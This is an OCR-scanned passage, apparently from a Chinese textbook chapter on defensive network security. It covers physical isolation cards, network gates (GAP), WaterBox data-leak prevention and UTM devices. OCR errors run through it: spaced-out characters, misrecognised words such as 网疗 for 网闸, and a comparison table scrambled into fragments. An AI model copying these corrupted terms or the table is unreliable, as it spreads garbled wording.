完成 数据 的 安全 传输 , 当然 其 实现 原理 也 是 基于 内 外 网 络 不 能 同时 连接 的 物理 隔离 原则 。 
其 中 ,第 四 代 物 理 隔 离 产品 能 在 1 秒 钟 内 进行 高 达 1000 次 的 内 、 外 网 自动 切换 ,使 操作 者 根 
本 感觉 不 到 有 任何 延迟 ,同时 又 达到 物理 隔离 的 目的 ; 第 五 代 物 理 隔离 产品 是 通过 反射 的 
原理 代替 切换 开关 来 进行 内 、 外 网 的 物理 隔离 ,并 能 对 内 外 网 的 信息 进行 筛选 。 


12.32 国内 网 络 现状 及 物理 隔离 要 求 


“物理 隔离 ”对 于 政府 上 网 指 的 是 政府 内 部 网 不 得 直接 或 间接 与 际 互联 网 连接 ,必须 实 
行 物理 隔离 。 很 多 政府 部 门 有 一 个 面向 社会 交流 信息 的 外 部 网 ,这 个 网 络 和 Internet 是 连 
通 的 。 

根据 国家 保密 局 2000 年 1 月 1 日 颁布 实施 的 (计算 机 信息 系统 国际 联网 保密 管理 规 
定 ) 第 二 章 保密 制度 第 六 条 的 规定 :“ 涉 及 国家 秘密 的 计算 机 信息 系统 ,不 得 直接 或 间接 地 
与 国际 互联 网 或 其 他 公共 信息 网 络 相连 接 , 必 须 实行 物理 隔离 .要 实现 公共 信息 网 (外 部 
网 ) 与 局 域 网 络 (内 部 网 ) 物 理 隔 离 的 目的 ,必须 做 到 以 下 几 点 。 
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Q@ 在 物理 传输 上 使 内 外 网 络 隔离 ,确保 外 部 网 不 能 通过 网 络 连接 而 侵入 内 部 网 ; 同时 
防止 内 部 网 信息 通过 网 络 连接 泄漏 到 外 部 网 。 

@ 在 物理 辆 射 上 隔断 内 部 网 与 外 部 网 ,确保 内 部 网 信息 不 会 通过 电磁 辐射 或 耦合 方式 
泄漏 到 外 部 网 。 

Q 在 物理 存储 上 隔断 两 个 网 络 环境 ,对 于 断 电 后 会 丢失 信息 的 设备 ,如 内 存 、 处 理 器 等 
和 暂 存 设备 ,要 在 网 络 转换 时 做 清除 处 理 , 防 止 残留 信息 串 网 ; 对 于 断 电 非 丢失 性 设备 ,如 磁 
带 机 、 硬 盘 等 存储 设备 ,内 部 网 与 外 部 网 信息 要 分 开 存 储 ; 严格 限制 可 移动 介质 的 使 用 ,如 
无 线 联 网 的 便携 式 计算 机 等 。 


12.33 物理 隔离 卡 的 类 型 及 比较 
1. 物理 隔离 卡 的 类 型 


物理 隔离 卡 是 适用 于 X86 平台 的 计算 机 或 网 络 工作 站 的 硬件 产品 ,可 以 在 不 对 系统 重 
新 设置 的 情况 下 ,实现 单 台 计算 机 连接 内 外 两 个 网 络 。 具 有 安全 性 能 高 ,使 用 方便 和 维护 费 
用 低 等 特点 。 隔 离 卡 的 物理 位 置 如 图 12. 1 所 示 。 


《内 部 网 络 > 


图 12.1 隔离 卡 物理 位 置 示意 图 


市 场 上 现 有 的 物理 隔离 卡 产 品 主要 有 两 种 。 以 下 对 这 两 种 隔离 产品 介绍 。 

(1) 单 硬盘 隔离 卡 

单 硬盘 隔离 卡 的 工作 原理 : 在 安装 了 单 硬盘 隔离 卡 的 计算 机 上 ,通过 对 硬盘 分 区 及 硬 
件数 据 读 写 控制 ,将 单个 硬盘 物理 地 分 割 为 两 个 工作 区 ,并 分 别 安装 独立 的 操作 系统 ,可 以 
将 其 视 为 两 台独 立 工 作 的 虚拟 计算 机 。 但 用 户 在 同一 时 间 段 内 ,只 能 在 其 中 一 个 工作 区 的 
操作 系统 环境 下 工作 ,不 能 同时 对 两 个 工作 区 进行 数据 操作 。 每 个 工作 区 各 自 连 接 不 同 的 
网 络 ( 一 个 连接 内 部 网 络 , 一 个 连接 外 部 网 络 ) ,网 络 安全 隔离 卡 的 控制 系统 在 低层 硬件 结构 
上 ,对 计算 机 的 硬盘 数据 存 取 进行 监控 ,防止 进行 任何 跨 工作 区 和 跨 网 络 的 非法 数据 操作 ， 
有 效 地 保护 单机 和 网 络 的 信息 安全 。 用 户 还 可 以 在 两 个 工作 区 之 间 自 由 切换 ,并 且 在 整个 
切换 过 程 中 ,两 个 工作 区 始终 处 于 隔离 状态 。 

(2) 双 硬 盘 隔离 卡 

双 硬 盘 隔 离 卡 是 安装 在 用 户 计算 机 网 络 接口 和 串 行 通信 口上 的 标准 计算 机 功能 扩展 板 
结构 ,是 一 种 实现 用 户 计算 机 和 两 个 网 络 系统 中 的 一 个 网 络 实现 物理 连接 并 切换 的 设备 。 
利用 双 硬 盘 隔 离 卡 切换 软件 ,用 户 可 通过 发 送 切换 指令 来 设置 网 络 安全 隔离 卡 的 工作 状态 。 
重新 开机 后 通过 串 行 通信 和 口 , 读 取 网 络 安全 隔离 卡 的 工作 状态 ,来 实现 工作 站 与 指定 网 络 系 
统 的 物理 连接 。 两 个 硬盘 分 别 有 独 立 的 操作 系统 ,并 独立 导入 ,所 以 两 个 硬盘 不 会 被 同时 
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激活 。 
2. 单 硬盘 隔离 卡 与 双 硬 盘 隔离 卡 的 比较 


单 硬盘 隔离 卡 与 双 硬 盘 隔 离 卡 的 比较 如 下 : 

a 双 硬 盘 隔 离 卡 作为 物理 隔离 技术 发 展 过 程 中 的 过 渡 产品 ,其 技术 与 实现 机 制 都 远 落 
后 于 单 硬盘 隔离 卡 。 

@ 单 硬盘 隔离 卡 充分 考虑 了 现 有 计算 机 设备 的 可 用 性 , 即 在 不 需要 增加 硬盘 的 情况 下 
实现 物理 隔离 ,这 在 很 大 程度 上 充分 利用 并 保护 了 现 有 的 硬盘 资源 ; 而 双 硬 盘 隔 离 卡 需要 
再 增加 一 块 硬盘 ,这 不 但 造成 资源 闲置 ,而 且 双 硬盘 隔离 卡 的 技术 机 制 加快 了 硬盘 的 损坏 速 
度 ,因为 对 硬盘 频繁 地 加 电 和 断 电 , 会 缩短 硬盘 的 使 用 寿命 (由 于 国家 保密 局 不 允许 热切 换 
的 双 硬 盘 隔 离 卡通 过 认证 ,所 以 市 场 上 有 保密 局 认证 的 双 硬 盘 隔 离 卡 都 采用 冷 切 换 机 制 ) 。 

@ 单 硬盘 隔离 卡 的 可 选择 .可 控制 的 数据 交换 区 ,解决 了 公共 数据 传 向 安全 分 区 的 问 
题 ,该 技术 达到 了 * 既 要 隔离 又 要 安全 交换 ”的 目的 ; 而 安装 双 硬 盘 隔 离 卡 的 计算 机 如 果 想 
进行 数据 交换 ,只 能 通过 软盘 .移动 硬 盘 等 其 他 存储 介质 。 

@ 单 硬盘 隔离 卡 可 以 保护 磁盘 的 主 引导 目录 。 

加 单 硬盘 隔离 卡 加 入 了 对 主板 BIOS 的 保护 功能 ,能 够 在 系统 工作 状态 期 间 检测 和 拒 
绝对 BIOS 的 写 和 请求 ,有 效 地 防护 了 系统 在 这 方面 的 安全 漏洞 。 

如 果 需 要 物理 隔离 的 计算 机 已 配置 有 较 大 的 硬盘 ,并 且 用 户 有 内 外 网 交换 数据 的 需求 ， 
则 推荐 选择 单 硬盘 隔离 卡 ; 如 果 需 要 物理 隔离 的 计算 机 所 使 用 的 硬盘 空间 较 小 , 则 可 选择 
双 硬 盘 隔 离 卡 。 


12.4 网 闸 在 网 络 安全 中 的 应 用 


12.41 网 闸 概述 


安全 隔离 与 信息 交换 系统 , 即 网 闸 ,是 新 一 代 高 安全 度 的 企业 级 信息 安全 防护 设备 , 它 
依靠 安全 隔离 技术 为 信息 网 络 提供 了 更 高 层次 的 安全 防护 功能 ,不 仅 使 得 信息 网 络 的 抗 攻 
击 能 力 大 大 增强 ,而 且 有 效 地 防范 了 信息 外 泄 事件 的 发 生 。 

如 今 网 络 隔离 技术 已 经 受到 越 来 越 多 的 重视 ,重要 的 网 络 和 部 门 均 开始 采用 隔离 网 闸 
产品 来 保护 内 部 网 络 和 关键 点 的 基础 设施 。 目 前 世界 上 主要 有 三 类 隔离 网 疗 技术 , 即 SCSI 
技术 , 双 端 口 RAM 技术 和 物理 单 向 传输 技术 。SCSI 是 典型 的 拷 盘 交换 技术 , 双 端 口 RAM 
也 是 模拟 拷 盘 技术 ,物理 单 向 传输 则 是 二 极 管 单 向 技术 。 


1242 网 闸 的 概念 


隔离 网 闻 在 保证 两 个 网 络 安全 隔离 的 基础 上 实现 安全 信息 交换 和 资源 共享 的 技术 。 它 
采用 独特 的 硬件 设计 并 集成 多 种 软件 防护 策略 ,能 够 防御 各 种 已 知 和 未 知 的 攻击 ,显著 提高 
内 网 的 安全 强度 ,为 用 户 创造 了 安全 的 网 络 应 用 环境 。 
隔离 网 闻 的 英文 名 称 为 GAP,GAP 源 于 英文 Air Gap,GAP 技术 是 一 种 通过 专用 硬件 
使 两 个 或 者 两 个 以 上 的 网 络 在 不 连通 的 情况 下 ,实现 安全 数据 传输 和 资源 共享 的 技术 。 
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第 一 代 网 闸 的 技术 原理 是 利用 单刀 双 掷 开 关 , 使 用 内 外 网 处 理 单元 的 分 时 存 取 共享 存 
储 设 备 来 完成 数据 交换 的 ,实现 了 在 空气 缝隙 隔离 (Air Gap) 情 况 下 的 数据 交换 。 第 一 代 网 
疗 的 其 安全 原理 是 通过 应 用 层 数据 提取 与 安全 审查 ,达到 杆 绝 基于 协议 层 的 攻击 和 增强 应 
用 层 安 全 的 效果 。 

第 二 代 网 闻 正 是 在 吸收 了 第 一 代 网 闸 优点 的 基础 上 ,创造 性 地 利用 全 新 理念 的 专用 交 
换 通道 (Private Exchange Tunnel,PET) 技 术 ,在 不 降低 安全 性 的 前 提 下 完成 内 外 网 之 间 高 
速 的 数据 交换 ,有效 地 克服 了 第 一 代 网 逆 的 丙 端 。 第 二 代 网 闸 的 安全 数据 交换 过 程 是 通过 
专用 硬件 通信 卡 .私有 通信 协议 和 加 密 签名 机 制 来 实现 的 ,虽然 仍 是 通过 应 用 层 数据 提取 与 
安全 审查 ,达到 杜绝 基于 协议 层 的 攻击 和 增强 应 用 层 安 全 效果 的 ,但 却 提供 了 比 第 一 代 网 闸 
更 多 的 网 络 应 用 支持 ,并 且 由 于 其 采用 的 是 专用 高 速 硬件 通信 卡 , 所 以 使 得 其 处 理 能 力 大 大 
提高 ,达到 第 一 代 网 闸 的 几 十 倍 , 而 私有 通信 协议 和 加 密 签名 机 制 保证 了 内 外 处 理 单 元 之 间 
数据 交换 的 机 密 性 、 完 整 性 和 可 信 性 ,从 而 在 保证 安全 性 的 同时 ,提供 了 更 好 的 处 理性 能 ,能 
够 适应 复杂 网 络 对 隔离 应 用 的 需求 。 传 统 防火 墙 和 网 疗 的 各 项 功能 对 比如 表 12. 1 所 示 。 


表 12.1 传统 防火 墙 和 网 闸 功能 对 比 表 


对 比 项 目 传统 防火 墙 网 疗 
在 GAP 技术 的 基础 上 ,综合 了 访问 控 
安全 机 抽 se 制 、 内 容 过 滤 、 病 毒 查 杀 等 技术 ,具有 全 
面 的 安全 防护 功能 
本 防火 墙 硬件 设计 可 能 存在 安全 | 硬件 设计 采用 基于 GAP 技术 的 体系 结 
漏洞 ,遭受 攻击 后 导致 网 络 竣 羔 | 构 ,运行 稳定 ,不 会 因 网 络 攻击 而 瘫痪 
采用 专用 安全 操作 系统 作为 软件 支撑 系 
操作 系统 设计 ee 统 ,实行 强制 访问 控制 ,从 根本 上 杜绝 可 
被 黑客 利用 的 安全 漏洞 
| 采用 专用 映射 协议 代 葵 原 网 络 协议 实现 
网 络 协议 处 理 人 | SGAP 系统 内 部 的 统 数据 传输 ,消除 了 
一 般 网 络 协议 可 被 利用 的 安全 漏洞 
有 被 攻破 的 防火 墙 只 是 个 简单 的 | 即使 系统 的 外 网 处 理 单元 竣 痰 ,网 络 攻 
路 由 器 ,将 危及 内 网 安全 击 也 无 法 触及 内 网 处 理 单元 
可 管理 性 管理 配置 有 一 定 复杂 性 管理 配置 简易 
rn 可 结合 防火 墙 .IDS.VPN 等 安全 设备 运 
| 行 ,形成 综合 网 络 安全 防护 平台 


1243 网 六 工作 原理 


GAP 技术 的 基本 原理 是 : 切断 网 络 之 间 的 通用 协议 连接 ,将 数据 包 分 解 或 重组 为 静态 
数据 ,然后 对 静态 数据 进行 安全 审查 ,包括 网 络 协 议 检 查 和 代码 扫描 等 ,确认 后 的 安全 数据 
流入 内 部 单元 ,最 终 内 部 用 户 通过 严格 的 身份 认证 机 制 获取 所 需 数据 。 

安全 隔离 与 信息 交换 系统 (Secure GAP,SGAP) 一 般 由 三 部 分 构成 : 内 网 处 理 单元 、 外 
网 处 理 单元 和 专用 隔离 硬件 交换 单元 。 系 统 中 的 内 网 处 理 单 元 连接 内 部 网 ,外 网 处 理 单元 
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连接 外 部 网 ,专用 隔离 硬件 交换 单元 在 任 一 时 刻 仅 连接 内 网 处 理 单元 或 外 网 处 理 单元 ,与 两 
者 间 的 连接 受 硬件 电路 控制 高 速 切换 。 这 种 独特 设计 保证 了 专用 隔离 硬件 交换 单元 在 任 一 
时 刻 仅 连通 内 部 网 或 者 外 部 网 , 既 满足 了 内 部 网 与 外 部 网 网 络 物理 隔离 的 要 求 ,又 能 实现 数 
据 的 动态 交换 。SGAP 系统 的 嵌入 式 软件 系统 里 内 置 了 协议 分 析 引 擎 内容 安全 引擎 和 病 
毒 查 杀 引擎 等 多 种 安全 机 制 , 可 以 根据 用 户 需求 实现 复杂 的 安全 策略 。SGAP 系统 广泛 应 
用 于 银行 ,政府 等 部 门 的 内 部 网 络 访问 外 部 网 络 ,也 可 用 于 内 部 网 不 同 信任 域 间 的 信息 
交互 。 


1244 网 闸 的 应 用 定位 


虽 涉 密 网 与 非 涉 密 网 之 间 。 

@ 局 域 网 与 互联 网 之 间 ( 内 网 与 外 网 之 间 ): 有 些 局 域 网 络 ,特别 是 政府 办 公 网 络 , 涉 
及 政府 敏感 信息 ,有 时 需要 与 互联 网 在 物理 上 断 开 , 使 用 物理 隔离 网 闻 是 一 个 常用 的 办 法 。 

@@ 办 公 网 与 业务 网 之 间 : 办 公 网 络 与 业务 网 络 的 信息 敏感 程度 不 同 , 例 如 银行 的 办 公 
网 络 和 银行 业务 网 络 就 是 很 典型 的 信息 敏感 程度 不 同 的 两 类 网 络 。 为 了 提高 工作 效率 ,办 
公 网 络 有 时 需要 与 业务 网 络 交换 信息 。 为 保障 业务 网 络 的 安全 ,比较 好 的 办 法 就 是 在 办 公 
网 与 业务 网 之 间 使 用 物理 隔离 网 闸 ,实现 两 类 网 络 的 物理 隔离 。 

@ 电子 政务 的 内 网 与 专 网 之 间 : 在 电子 政务 系统 建设 中 ,要 求 政 府内 网 与 外 网 之 间 使 
用 逻辑 隔离 ,在 政府 专 网 与 内 网 之 间 使 用 物理 隔离 。 现 在 常用 的 方法 是 使 用 物理 隔离 网 闸 

@ 业务 网 与 互联 网 之 间 : 电子 商务 网 络 一 边 连 接着 业务 网 络 服务 器 ,一 边 通过 互联 网 
连接 着 广大 用 户 。 为 了 保障 业务 网 络 服务 器 的 安全 ,在 业务 网 络 与 互联 网 之 间 应 实现 物理 
隔离 。 


1245 网 六 的 应 用 领域 


目前 ,国产 的 中 网 隔离 网 疗 、 伟 思 网 络 安全 隔离 网 闻 和 联想 网 御 安全 隔离 网 疗 等 网 闻 产 
品 , 可 以 实现 信任 网 络 用 户 与 外 部 的 文件 交换 ,收发 邮件 . 单 向 浏览 和 数据 库 交 换 等 功能 , 同 
时 已 在 电子 政务 中 ,如 政府 内 部 的 领导 决策 支持 系统 政务 应 用 系统 (如 OA 系统 、 专 用 业务 
处 理 系统 ) 和 公共 信息 处 理 系统 (如 信息 采集 系统 、 信 息 交换 系统 和 信息 发 布 系统 等 ) 得 到 了 
应 用 。 网 闸 很 好 地 解决 了 安全 隔离 下 的 信息 可 控 交 换 等 问题 ,从 而 推动 了 电子 政务 走向 应 
用 时 代 。 

由 于 网 疗 可 以 实现 两 个 物理 层 断 开 网 络 间 的 信息 交换 ,构建 信息 可 控 交 换 “ 安 全 岛 ”, 所 
以 在 政府 .军队 和 电力 等 部 门 具 有 极为 广阔 的 应 用 前 景 。 网 闸 突 破 了 电子 政务 外 网 与 内 网 
之 间 数 据 交换 的 瓶颈 ,并 消除 了 政府 部 门 之 间 因 安全 造成 的 信息 “孤岛 效应 ”。 目 前 网 疗 大 
都 提供 了 文件 交换 收发 邮件 浏览 网 页 等 基本 功能 。 此 外 网 闸 产品 在 负载 均衡 .元 余 备份 、 
硬件 密码 加 速 和 集成 管理 等 方面 需要 进一步 改进 和 完善 ,同时 集成 人 侵 检 测 、 密 通道 和 数字 
证 书 等 技术 ,也 成 为 新 一 代 网 闸 产品 发 展 的 趋势 。 

目前 ,国外 有 Whale 公司 的 E-GAP 系统 、Spearhead 公司 的 NetGAP 等 网 疗 产品 ,在 军 
政 . 航 天 和 金融 等 部 门 被 采用 。Whale 公司 将 E-GAP 系统 定位 为 应 用 层 的 防护 设备 。 该 产 
品 通过 隔离 服务 器 .数据 暂 存 区 、 隔 离开 关 (Air GAP Switch) ,并 结合 应 用 层 安 全 控制 来 达 
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到 整体 安全 。 它 集成 了 加 密 技术 ,授权 认证 .PKI、.HTTP 镜像 .规则 过 滤 和 Air GAP( 空 气 
隔离 ) 等 多 种 安全 技术 构成 软 硬 件 一 体 化 平台 。 

Spearhead 公司 的 NetGAP 直接 连接 两 个 网 络 。 通 过 插 在 PCI 槽 的 安全 电路 板 与 
LVDS 总 线 配合 ,实现 了 Reflective GAP 技术 ,每 一 个 安全 电路 板 包含 一 对 双开 关 结 构 , 双 
开关 结构 确保 了 在 两 个 网 络 之 间 有 一 个 完全 的 链 路 层 隔 断 。 数 据 包 从 外 网 传 至 内 网 需要 经 
历 会 话 终止 剥离 数据 编码 .恶意 代码 扫描 、\ 传 输 恢复 和 会 话 再 生 等 过 程 ,以 确保 内 网 的 安 
全 性 。 另 外 ,NetGAP 还 提供 了 入 侵 监 测 负载 均衡 和 容错 等 扩展 功能 。 

总 之 ,安全 网 闻 适 用 于 政府 .军队 公安 .银行 .工商 .航空 .电力 和 电子 商务 等 有 高 安全 
级 别 需 求 的 网 络 , 当 然 网 疗 也 可 用 来 隔离 保护 主机 服务 器 ,或 专门 隔离 保护 数据 库 服务 器 。 


12.5 防水 墙 技术 


防水 墙 (WaterBox) 是 防止 内 部 信息 外 泄 的 安全 系统 。 它 从 内 部 安全 体系 架构 和 网 络 
管理 层面 上 ,实现 了 内 部 安全 的 完美 统一 ,有 效 地 降低 了 ”堡垒 从 内 部 攻破 ”的 可 能 性 。 防 水 
墙 系统 综合 利用 密码 .身份 认证 ,访问 控制 和 审计 跟踪 等 技术 手段 ,对 涉 密 信息 .重要 业务 数 
据 和 技术 专利 等 敏感 信息 的 存储 ,传播 和 处 理 过 程 实施 安全 保护 ,最 大 限度 地 防止 敏感 信息 
的 汽 漏 .被 破坏 和 违规 外 传 , 并 完整 记录 涉及 敏感 信息 的 操作 日 志 , 以 便 事后 审计 和 追究 泄 
密 责 任 。 


12.51 防水 墙 的 体系 结构 


完整 的 防水 墙 系统 由 三 部 分 组 成 : 防水 墙 服 务 器 (WaterBox Server)、 防 水 墙 控制 台 
(WaterBox Console) 和 防水 墙 客户 端 (WaterBox Watcher) 。 

(1) 防水 墙 服务 器 

防水 墙 服务 器 包括 服务 器 端 软件 和 支持 数据 库 , 是 防水 墙 系统 的 核心 部 分 。 通 过 安全 
认证 机 制 ,建立 与 多 个 客户 端 ( 受 控制 的 个 人 计算 机 ?系统 的 连接 ,实现 对 多 个 客户 端 系统 的 
配置 .策略 制定 .资源 管理 和 操作 审计 等 功能 。 

(2) 防水 墙 控制 台 
防水 墙 控制 台 是 系统 管理 员 .操作 员 、 审 计 员 等 和 防水 墙 系统 交互 的 图 形 界面 ,实现 系 
统管 理 、 参 数 配置 .策略 管理 和 系统 审计 等 功能 。 控 制 台 采 用 分 权 分 级 的 授权 模式 ,严格 限 
制 对 敏感 信息 的 访问 权限 ,以 提高 系统 的 安全 性 ,保证 信息 安全 。 
(3) 防水 墙 客户 端 
防水 墙 客 户 端 是 安装 于 受 监控 主机 上 的 监测 软件 ,是 站 在 客户 端 旁 边 的 “安全 哨兵 ”。 
它 强 制 执行 来 自 服务 器 的 安全 策略 ,根据 安全 策略 监测 客户 端 用 户 的 行为 。 客 户 端 软件 采 
用 了 严密 措施 ,防止 本 地 用 户 自行 印 载 . 关 闭 监 控 程 序 。 
防水 墙 控制 台 和 客户 端 软件 ,可 从 服务 器 端 获得 最 新 版 本 ,实现 远程 自动 升级 。 


12.52 防水 墙 系统 设计 理念 


防水 墙 系统 的 设计 理念 是 保护 用 户 敏感 信息 不 被 非法 外 传 ,防止 泄密 事件 发 生 , 从 而 保 
证 内 部 安全 。 它 主要 从 以 下 几 个 方面 来 保障 内 网 安全 。 
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O@ 失 泄 密 防 护 : 信息 外 传 途径 主要 有 网 络 传输 ,移动 存储 带 出 和 打印 到 纸 介质 文稿 三 

种 途径 。 防 水 墙 系 统 针对 这 三 种 泄密 途径 都 做 了 全 面 的 防护 ,可 以 根据 实际 情况 选择 “ 启 
用 ?或 “禁用 ”, 还 可 选择 记录 日 志 以 备 事 后 追踪 。 另 外 防水 墙 系统 还 能 够 根据 策略 “启用 ”和 
“禁用 ?主机 上 可 能 造成 泄密 的 外 设 接口 ,作为 实施 失 泄密 防护 在 硬件 层次 上 的 辅助 手段 。 

@ 文件 安全 服务 : 文件 安全 服务 提供 了 对 敏感 文件 的 加 解密 安全 防护 ,充分 利用 对 称 
和 非 对 称 算法 的 优点 对 文件 和 密 钥 进行 管理 。 为 了 保证 敏感 信息 不 被 非法 解读 ,防水 墙 系 
统 使 用 了 加 密 域 的 概念 。 加 密 域 是 一 组 防水 墙 系统 用 户 的 组 合 ,每 个 文件 在 加 密 时 均 选 择 
加 密 域 ,只 有 处 于 加 密 域内 的 用 户 才 能 进行 解密 阅读 ,有 效 地 防止 了 文件 在 传输 过 程 中 可 能 
造成 的 泄密 ,也 防止 了 因 计 算 机 丢失 可 能 造成 的 泄密 事件 的 发 生 。 

@ 运行 状况 监测 : 对 受 控 主机 ,监控 其 历史 运行 状况 ,包括 用 户 删除 文件 、 系 统 服务 ， 
屏幕 截取 等 操作 进行 记录 ,方便 系统 管理 员 查 看 管理 。 

@ 系统 资源 管理 : 系统 资源 管理 功能 用 于 收集 受 控 主机 的 软 硬 件 信息 ,并 上 传 至 服务 
器 作为 初始 资源 信息 备份 。 系 统管 理 人 员 可 以 随时 获得 所 管理 部 门 的 主机 的 系统 资源 信 
息 。 完 整 的 系统 资源 管理 信息 包括 系统 信息 ,硬件 信息 、 用 户 和 组 等 信息 。 

@ 扩展 身份 认证 : 接管 身份 认证 。 如 果 接 管 了 Windows 身份 认证 ,只 有 输入 合法 的 防 
水 墙 用 户 名 和 口令 , 才 可 以 登录 Windows 系统 。 


12.6 UTM 技术 发 展 和 现状 


1261 UTM 的 起 源 和 概述 


随 着 网 络 的 日 益 发 展 和 应 用 软件 的 变化 ,“ 复 杂 性 ”已 经 成 为 企业 IT 管理 部 门 工 作 的 
代名词 。 越 来 越 快 的 网 络 传 输 速度 、 越 来 越 多 的 通信 协议 和 网 络 用 户 ,已 经 使 得 他 们 管理 的 
网 络 变 得 错综复杂 。 大 量 应 用 软件 的 更 新 带 来 了 多 种 形态 的 网 络 攻 击 和 垃圾 流量 。 企 业 
IT 管理 者 不 得 不 面 对 日 益 增 长 的 网 络 威胁 。 而 这 些 网 络 攻击 方式 已 经 从 传统 的 简单 网 络 
层 数据 攻击 升级 到 多 层次 的 复合 型 攻击 。 这 使 得 IT 管理 者 不 得 不 付出 更 多 的 维护 成 本 来 
管理 自己 的 网 络 , 极 大 地 增加 了 安全 维护 成 本 。 

这 些 日 益 增 强 的 复合 型 攻击 集成 了 网 络 层 和 内 容 层 数据 的 威胁 ,基本 都 会 嵌入 部 分 黑 
客 和 木马 程序 。 它 们 入 侵 系统 后 ,迅速 在 内 部 网 络 形成 DoS/DDoS 攻击 流 , 其 中 以 蠕虫 病 
毒 最 为 显著 。 它 们 可 以 借助 邮件 、 网 页 及 数据 共享 等 途径 快速 传播 ,而 这 些 攻击 方式 给 企业 
的 网 络 运 营造 成 了 严重 的 影响 。 

为 了 有 效 地 防御 目前 的 复合 型 威胁 ,企业 需要 求助 于 新 型 的 安全 设备 。 这 些 安全 设备 
能 够 通过 简单 的 配置 和 管理 ,以 较 低 的 维护 成 本 为 用 户 提供 一 个 高 级 别 保护 的 “安全 岛 ”。 
在 安全 市 场 上 最 新 出 现 的 一 类 产品 称 为 统一 威胁 管理 (UTM) 设 备 。 这 类 产品 集成 多 种 安 
全 技术 于 一 身 ,包括 防火 墙 .虚拟 专用 网 (VPN)、 入 侵 检 测 和 防御 (IDP) 以 及 网 关 防 病毒 等 
威胁 管理 安全 设备 ,无 需 任何 用 户 软 件 安装 , 极 大 地 提高 了 企业 的 安全 和 管理 能 力 。 威 胁 管 
理 安全 设备 可 能 还 包括 其 他 特性 ,如 安全 管理 ,策略 管理 .服务 质量 (QoS)、 负 载 均衡 .高 可 
用 性 (HA) 和 带宽 管理 等 。 但 是 这 些 特 性 通常 都 是 为 安全 功能 服务 的 。 
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1262 UTM 的 技术 特点 和 优势 


UTM 设备 可 以 很 好 地 防御 目前 流行 的 混合 型 数据 攻击 的 威胁 ,就 目前 复合 型 攻击 方 
式 的 出 现 使 得 Antivirus 和 IDSVIDP 的 防御 分 割 点 逐渐 消失 ,任何 单一 的 检测 方式 都 无 法 
完善 地 解决 目前 所 面临 的 威胁 。 

UTM 技术 可 以 进行 改良 的 信息 包 检 查 、 识 别 应 用 层 信 息 、 命 令 入 侵 检测 和 阻 断 、 蠕 虫 
病毒 防护 以 及 高 级 的 数据 包 验 证 机 制 。 这 些 特性 和 技术 使 得 IT 管理 人 员 可 以 很 容易 地 控 
制 如 Instant Message 传输 、BT 多 线程 动态 应 用 下 载 和 Skype 等 新 型 软件 的 应 用 ,并 且 阻 
断 来 自 内 部 的 数据 攻击 以 及 垃圾 数据 流 的 泛滥 。 同 时 ,设备 可 以 支持 动态 的 行为 特征 库 更 
新 能 力 。 特 别针 对 分 包 攻 击 的 效果 明显 。 但 UTM 技术 必须 要 有 强大 的 硬件 平台 支撑 , 否 
则 难以 适应 当前 的 网 络 性 能 要 求 。UTM 产品 的 应 用 优势 如 下 : 

。 降低 安全 管理 复杂 度 : 集成 的 维护 平台 ; 单一 服务 体系 结构 ; 集中 的 安全 日 志 

管理 。 

。 组 合式 的 安全 保护 。 

。 应 用 的 灵活 性 。 

。 良好 的 可 扩展 性 。 

。 进一步 降低 成 本 。 

UTM 设备 可 以 减少 与 安全 功能 相关 的 采集 .安装 和 管理 支出 ,确保 企业 网 络 的 连续 性 
和 可 用 性 ,为 目前 流行 的 安全 威胁 提供 有 效 的 防御 。 


12.63 用 户 的 使 用 现状 


根据 UTM 技术 的 特点 和 优势 可 以 看 出 ,中 小 型 企业 、 多 分 支 机 构 企 业 以 及 安全 运营 商 
是 UTM 产品 的 率先 使 用 者 。2003 年 UTM 产品 在 全 球 只 有 7 个 厂商 ,而 2004 年 这 一 数量 
在 扩大 了 两 倍 。 大 部 分 知名 的 安全 厂商 都 陆续 推出 了 自己 的 UTM 产品 。2003 年 这 一 市 
场 超过 了 1 亿美 元 ,从 2002 年 到 2003 年 的 增长 率 超过 了 160%。 而 在 欧洲 的 UTM 市 场 ， 
2004 年 前 两 个 季度 的 增长 率 就 超过 了 35%。 对 于 企业 用 户 来 说 ,UTM 设备 无 疑 是 最 好 的 
选择 ,在 安全 防御 和 安全 维护 成 本 上 都 会 给 企业 节约 大 量 的 资本 。 


1264 ”UTM 发展 趋势 


网 络 安全 的 威胁 的 发 展 经 历 了 从 物理 攻击 、 协 议 攻 击 、 数 据 包 攻击 到 文件 型 攻击 的 转 
变 ,单一 的 网 络 检测 技术 越 来 越 显示 出 其 薄弱 的 一 面 。 威 胁 的 多 样 化 发 展 模糊 了 防御 技术 
的 分 类 界限 。 新 型 的 UTM 产品 将 会 以 网 络 行为 威胁 为 防御 基础 ,病毒 .蠕虫 .黑客 攻击 、 森 
马 的 威胁 分 类 逐渐 消失 ,行为 特征 分 析 成 为 安全 防御 的 基础 ,而 相应 的 安全 内 容 级 管理 则 成 
为 越 来 越 重要 的 部 分 。 

IDC 预测 全 球 威胁 管理 安全 设备 市 场 的 销售 总 量 以 年 均 16. 8% 的 速度 增长 ,到 2008 
年 将 达到 34. 5 亿美 元 。 而 这 其 中 UTM 将 会 逐渐 成 为 市 场 的 主流 。 

目前 威胁 管理 安全 设备 市 场 包 括 两 个 不 同 的 分 市 场 : 防火 墙 /VPN 和 统一 威胁 管理 。 

威胁 管理 设备 ,尤其 是 UTM 产品 , 越 来 越 受 到 中 小 企业 的 欢迎 。 由 于 存在 大 量 潜在 用 
户 , 这 部 分 市 场 将 成 为 所 有 厂商 的 目标 。 
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尽管 安全 设备 市 场 发 展 迅速 ,但 来 自 基 础 设施 和 技术 的 挑战 使 得 该 市 场 必须 保持 稳定 
的 增长 。 下 面 介 绍 UTM 的 发 展 趋势 。 


1. UTM 安全 设备 的 市 场 越 来 越 大 


依据 提供 额外 安全 措施 的 特点 ,UTM 设备 提供 给 潜在 用 户 更 多 的 关于 建立 自身 安全 
基础 设施 的 选项 。UTM 设备 提供 给 用 户 相 当 大 的 灵活 性 ,同时 也 为 用 户 提供 了 一 个 标准 
的 管理 平台 。UTM 的 全 部 功能 都 能 被 应 用 ,或 者 该 产品 能 有 一 个 专门 的 用 途 一 一 用 于 网 
关 防 病毒 或 是 用 于 内 部 的 入 侵 检 测 。 当 UTM 作为 一 种 单 点 产品 来 应 用 时 ,企业 能 获得 统 
一 管理 的 优势 ,并 且 也 能 在 不 使 用 新 设备 的 情况 下 ,应 用 自身 需要 的 任何 功能 。 


2. 中 小 企业 市 场 的 机 会 


